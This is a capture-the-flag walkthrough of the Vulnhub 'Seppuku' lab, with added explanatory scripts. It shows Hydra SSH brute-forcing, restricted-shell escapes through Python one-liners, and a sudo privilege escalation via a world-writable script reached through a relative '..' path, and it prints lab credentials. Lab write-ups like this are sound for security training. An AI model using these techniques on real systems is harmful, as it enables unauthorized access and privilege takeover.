Seppuku offsec Walkthrough
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researcher || TryHackMe Top 1% || Programming in C, Python || Bug Bounty ||
The Seppuku Offsec lab is a virtual penetration testing environment available on Vulnhub, designed to simulate real-world scenarios for practicing penetration testing. It's known for its intermediate to hard difficulty level and offers a variety of challenges to test your skills in reconnaissance, enumeration, exploitation, and privilege escalation.
Steps to complete Seppuku:
1. Reconnaissance:
- Use tools like Netdiscover and Nmap to identify the host IP and enumerate open ports. You'll typically find services running on ports such as FTP (21), SSH (22), HTTP (80), and several others.
2. Enumeration:
- Perform directory brute-forcing using tools like Dirb or GoBuster to find hidden directories and files on the web server. Key directories such as /keys and /secret often contain crucial information like SSH private keys and password lists.
3. Exploitation:
- Utilize the information gathered during enumeration to brute force SSH login using tools like Hydra. For instance, if you find a username and password list, you can use them to gain SSH access to the target machine.
4. Privilege Escalation:
- After gaining initial access, look for ways to escalate privileges. This might involve abusing sudo permissions or finding other users' credentials. For example, you might find hidden files that contain passwords for higher-privilege accounts, or exploit sudo rights to execute commands as the root user.
The Seppuku lab emphasizes learning through practical application of various penetration testing techniques, making it a valuable resource for both beginners and experienced security professionals.
Reconnaissance:
We always start with network scanning; here the port scan was done with Rustscan.
Rustscan showed the following open ports: 21 (FTP), 22 (SSH), 80 (HTTP), 139 and 445 (NetBIOS/SMB), 7080 (HTTPS), 7601 (HTTP) and 8088 (HTTP).
Enumeration
To gather more details we need to enumerate the host. With port 7601 open, I opened the target IP 192.168.1.104 in the browser, but that gave nothing useful.
Then I ran gobuster. The web root on port 80 turned up nothing, so I tried port 7601:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://192.168.191.90:7601
gobuster found several hidden directories, including /keys and /secret, and visiting each of them revealed sensitive information.
First I went to https://192.168.191.90:7601/production, but there was nothing hidden there.
Then I went to /secret and /keys, which gave a lot of information.
/secret
Open hostname:
I went through the folders one by one and found a hostname file.
Open jack.jpg.
Open passwd.bk:
After downloading passwd.bk, open password.lst:
I got a password.lst file, which I copied and saved on my Linux machine for the brute-force step:
nano password.txt
Then I visited /keys.
The downloaded private key is an RSA key that lets us log in over SSH without a password. Save it locally (for example with nano) and restrict its permissions before using it.
Exploitation:
Now that we have a password wordlist and the target machine's hostname, we can use this wordlist to brute-force the SSH password.
hydra -l seppuku -P password.txt 192.168.191.90 ssh
Hydra recovered the credentials seppuku:eeyoree.
After logging in, we looked for hidden files and discovered one called .passwd, which gave us a password, though at this point we did not know which account it belonged to.
Next we tried to move into the home directory, but the restricted rbash shell would not let us.
User flag:
I noticed that the cd command was not working, so I ran this command to spawn an unrestricted shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
After that, cd worked:
cd /home
ls -la
Here I found three users: tanto, samurai and seppuku.
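Why the Python one-liner works is easier to see in a reproducible way. The script below is an added example, not part of the walkthrough: it reproduces the rbash restriction with bash's own -r mode (the same thing an account whose login shell is /bin/rbash gets) and shows that a fresh, unrestricted child shell started from inside it is not restricted, which is exactly what pty.spawn("/bin/bash") does. It assumes bash is installed; the function names are mine.

```shell
#!/bin/sh
# Added example (not from the walkthrough): reproduce the rbash restriction
# and show why spawning a fresh, unrestricted shell gets around it.
# Assumes bash is available; "bash -r" is the restricted mode behind rbash.

# Returns 0 when a restricted bash refuses "cd", the symptom seen on the box.
rbash_blocks_cd() {
    # Expected: "bash: line 1: cd: restricted" on stderr and a non-zero exit
    if bash -r -c 'cd /' 2>/dev/null; then
        return 1
    fi
    return 0
}

# Returns 0 when a restricted bash also refuses a command given with a slash
# in its name (why the escape runs "python3", found on PATH, not /usr/bin/python3).
rbash_blocks_slash_commands() {
    if bash -r -c '/bin/pwd' >/dev/null 2>&1; then
        return 1
    fi
    return 0
}

# Prints the directory reached after escaping: a child "bash" started from
# inside the restricted shell carries no restriction, so cd works in it.
# The walkthrough gets the same effect with python3's pty.spawn("/bin/bash").
escape_and_cd() {
    bash -r -c 'bash -c "cd / && pwd"' 2>/dev/null
}

# Stand-alone run: show the three behaviours.
rbash_blocks_cd && echo "restricted shell: cd blocked"
rbash_blocks_slash_commands && echo "restricted shell: /bin/pwd blocked"
echo "after escape, cwd is: $(escape_and_cd)"
```

The escape only needs some program that can start a new shell: python, perl, vi, or plain bash all work, as long as the program name itself has no slash and is on the restricted PATH.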
I tried to log in as tanto over SSH with the passwords I had, without success. Then I remembered the private RSA key I had downloaded from /keys.
To log in with the key I first had to restrict its permissions (chmod 600), otherwise SSH refuses to use it. With the key, SSH accepted the login as tanto.
I also logged in over SSH as the samurai user. There the rbash restriction appeared again, so I bypassed it with a Python one-liner as before and ran sudo -l to check for privilege escalation. It listed a command that samurai can run as root without a password:
python -c 'import os; os.system("/bin/bash");'
sudo -l
Privilege Escalation
The sudo rule lets samurai run, without a password, a file under /home/tanto/.cgi_bin, and tanto has read-write access to that home directory. Logged in as tanto, we looked for the .cgi_bin directory, but it did not exist. So we created it, wrote a script named bin inside it that launches /bin/bash, and gave everyone read, write and execute permission on it:
mkdir .cgi_bin
cd .cgi_bin/
echo "/bin/bash" > bin
chmod 777 bin
ls -la
Now it was time to abuse the sudo rule. We logged in as samurai again and ran the command below. The path with the .. components resolves to tanto's bin script, which sudo executes as root, giving us a root shell; from there we captured the root flag.
sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*
cd /root
ls
cat proof.txt
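The root cause here is a sudoers rule whose command path is relative and full of .. components: sudo resolves it from the caller's working directory, so it ends up executing a file inside another user's home, where that user controls the contents. The script below is an added example, not part of the walkthrough or the box, that models the rule and checks why it is exploitable. The sudoers line is a constructed assumption of what sudo -l showed samurai (the page only shows the resulting sudo command), the file layout is rebuilt in a temporary directory that stands in for /, and the function names are mine.

```shell
#!/bin/sh
# Added example (not from the walkthrough): model the sudo rule abused above
# and check why it is exploitable. The command path in the rule is relative
# and made of "..", so it is resolved from the caller's working directory and
# lands on a file inside tanto's home, which tanto can replace at will.

# Constructed sudoers entry: assumed shape of what "sudo -l" showed samurai.
SUDO_RULE='(ALL) NOPASSWD: ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*'

# Collapse "." and ".." components of $1, resolving a relative path against
# the directory $2. String logic only: nothing needs to exist on disk.
normalize_path() {
    path=$1
    case $path in
        /*) ;;
        *) path="$2/$path" ;;
    esac
    result=""
    oldifs=$IFS
    IFS=/
    for comp in $path; do
        case $comp in
            ""|.) ;;
            ..) result=${result%/*} ;;      # ".." above "/" stays at "/"
            *) result="$result/$comp" ;;
        esac
    done
    IFS=$oldifs
    printf '%s\n' "${result:-/}"
}

# Pull the command path (first token after "NOPASSWD:") out of a rule line.
rule_command() {
    printf '%s\n' "$1" | sed 's/^.*NOPASSWD:[[:space:]]*//' | awk '{print $1}'
}

# Throwaway copy of the part of the box's filesystem that matters. SANDBOX
# plays the role of "/", so the seven ".." can never climb above it.
SANDBOX=$(mktemp -d)
mkdir -p "$SANDBOX/home/samurai" "$SANDBOX/home/tanto/.cgi_bin"
printf '/bin/bash\n' > "$SANDBOX/home/tanto/.cgi_bin/bin"   # tanto's "bin" payload
chmod 777 "$SANDBOX/home/tanto/.cgi_bin/bin"               # tanto's chmod 777

# Print where the rule's command really points when run from cwd $2 and
# return 0 if that file exists and is world-writable, i.e. any local user
# can swap in their own payload. Return 1 if it is missing or not writable.
sudo_rule_target_writable() {
    resolved=$(normalize_path "$(rule_command "$1")" "$2")
    printf '%s\n' "$resolved"
    [ -f "$SANDBOX$resolved" ] && [ -n "$(find "$SANDBOX$resolved" -perm -002)" ]
}

# Stand-alone run: report on the rule as seen from samurai's home directory.
if sudo_rule_target_writable "$SUDO_RULE" /home/samurai; then
    echo "exploitable: rule target is world-writable"
else
    echo "rule target missing or not world-writable"
fi
```

Two things worth noting from the model. First, because the rule's path is relative, the file it names changes with the caller's working directory; the walkthrough's command works from /home/samurai, where seven .. components are enough to reach /. Second, the fix is not the chmod: even with bin set to 755, the rule still points into a directory owned by a non-root user, so tanto can rewrite the file. A sudo rule should name an absolute path under a root-owned directory.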
Root flag:
Thanks for reading.